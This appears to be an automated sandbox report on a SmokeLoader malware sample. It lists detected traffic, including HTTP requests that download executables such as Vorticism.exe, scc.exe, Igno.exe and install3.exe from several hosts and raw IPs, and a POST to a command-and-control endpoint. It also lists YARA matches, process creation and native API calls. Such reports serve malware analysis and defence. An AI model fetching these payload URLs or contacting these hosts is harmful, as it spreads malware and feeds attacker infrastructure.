found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: rcacademy.at
Source: global traffic HTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
Source: global traffic HTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
Source: global traffic HTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Dec 2021 14:32:14 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.bastinscustomfab.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbhfij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: rcacademy.at
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: fw8ex1BNek.exe, 00000000.00000002.427675780.000000000080A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF9760 17_2_02BF9760
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0BDF 17_2_02BF0BDF
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0BC4 17_2_02BF0BC4
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0B7A 17_2_02BF0B7A
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0B48 17_2_02BF0B48
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0C23 17_2_02BF0C23
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0470 17_2_02BF0470
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_02BF0462 17_2_02BF0462
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FDE38 17_2_052FDE38
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F8DE8 17_2_052F8DE8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F8DF8 17_2_052F8DF8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FCC68 17_2_052FCC68
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F865A 17_2_052F865A
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052FA050 17_2_052FA050
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05331810 17_2_05331810
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_053353F8 17_2_053353F8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05330448 17_2_05330448
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05332E48 17_2_05332E48
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533E0E2 17_2_0533E0E2
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05337BAE 17_2_05337BAE
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014DEC68 18_2_014DEC68
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014DCBD7 18_2_014DCBD7
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E4230 18_2_058E4230
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E3EE8 18_2_058E3EE8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E4B00 18_2_058E4B00
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E0013 18_2_058E0013
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E0040 18_2_058E0040
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E2230 23_2_023E2230
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E224B 23_2_023E224B
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E21B8 23_2_023E21B8
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E21EA 23_2_023E21EA
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E1EE0 23_2_023E1EE0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E1ED0 23_2_023E1ED0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_028993E0 23_2_028993E0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_028986A8 23_2_028986A8
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289D430 23_2_0289D430
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289B448 23_2_0289B448
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289CED7 23_2_0289CED7
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289D763 23_2_0289D763
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_029525F0 23_2_029525F0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02956AA0 23_2_02956AA0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0295EBB0 23_2_0295EBB0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0295F7F0 23_2_0295F7F0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_029909E8 23_2_029909E8
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02992230 23_2_02992230
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02992220 23_2_02992220
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02997771 23_2_02997771
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_73781BFF 24_2_73781BFF
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286A914 24_2_0286A914
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02869E6C 24_2_02869E6C
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865E6D 24_2_02865E6D
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02866677 24_2_02866677
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865E7B 24_2_02865E7B
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02869B92 24_2_02869B92
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02866FCF 24_2_02866FCF
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865B72 24_2_02865B72
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028690B1 24_2_028690B1
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028618C4 24_2_028618C4
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02867CC0 24_2_02867CC0
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286784E 24_2_0286784E
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286A06A 24_2_0286A06A
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028699DC 24_2_028699DC
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028665DC 24_2_028665DC
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028699D8 24_2_028699D8
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02866101 24_2_02866101
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865D1C 24_2_02865D1C
PE file contains strange resources
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Section loaded: mscorjit.dll Jump to behavior
Uses 32bit PE files
Source: fw8ex1BNek.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401889 Sleep,NtTerminateProcess, 0_2_00401889
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0040144E NtAllocateVirtualMemory, 0_2_0040144E
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401471 NtAllocateVirtualMemory, 0_2_00401471
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401824 Sleep,NtTerminateProcess, 0_2_00401824
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004024F3 NtClose, 0_2_004024F3
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401888 Sleep,NtTerminateProcess, 0_2_00401888
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004018A2 Sleep,NtTerminateProcess, 0_2_004018A2
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004018A6 Sleep,NtTerminateProcess, 0_2_004018A6
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0040151C NtMapViewOfSection, 0_2_0040151C
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00402127 NtQuerySystemInformation, 0_2_00402127
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004021F4 NtQueryInformationProcess, 0_2_004021F4
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004021AC NtQueryInformationProcess, 0_2_004021AC
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401FB5 NtQuerySystemInformation, 0_2_00401FB5
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401889 Sleep,NtTerminateProcess, 11_2_00401889
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_0040144E NtAllocateVirtualMemory, 11_2_0040144E
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401471 NtAllocateVirtualMemory, 11_2_00401471
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401824 Sleep,NtTerminateProcess, 11_2_00401824
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004024F3 NtClose, 11_2_004024F3
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401888 Sleep,NtTerminateProcess, 11_2_00401888
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004018A2 Sleep,NtTerminateProcess, 11_2_004018A2
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004018A6 Sleep,NtTerminateProcess, 11_2_004018A6
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_0040151C NtMapViewOfSection, 11_2_0040151C
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00402127 NtQuerySystemInformation, 11_2_00402127
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004021F4 NtQueryInformationProcess, 11_2_004021F4
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004021AC NtQueryInformationProcess, 11_2_004021AC
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401FB5 NtQuerySystemInformation, 11_2_00401FB5
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0541F9A0 NtAllocateVirtualMemory, 17_2_0541F9A0
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0541F8C0 NtUnmapViewOfSection, 17_2_0541F8C0
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02867502 NtAllocateVirtualMemory, 24_2_02867502
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028675C6 NtAllocateVirtualMemory, 24_2_028675C6
Source: 4924.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fw8ex1BNek.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\acgvitw Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/9@50/10
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe File read: C:\Users\desktop.ini Jump to behavior
Source: fw8ex1BNek.exe Virustotal: Detection: 39%
Source: fw8ex1BNek.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\fw8ex1BNek.exe "C:\Users\user\Desktop\fw8ex1BNek.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\acgvitw C:\Users\user\AppData\Roaming\acgvitw
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4924.exe C:\Users\user\AppData\Local\Temp\4924.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8CE5.exe C:\Users\user\AppData\Local\Temp\8CE5.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DB56.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4924.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
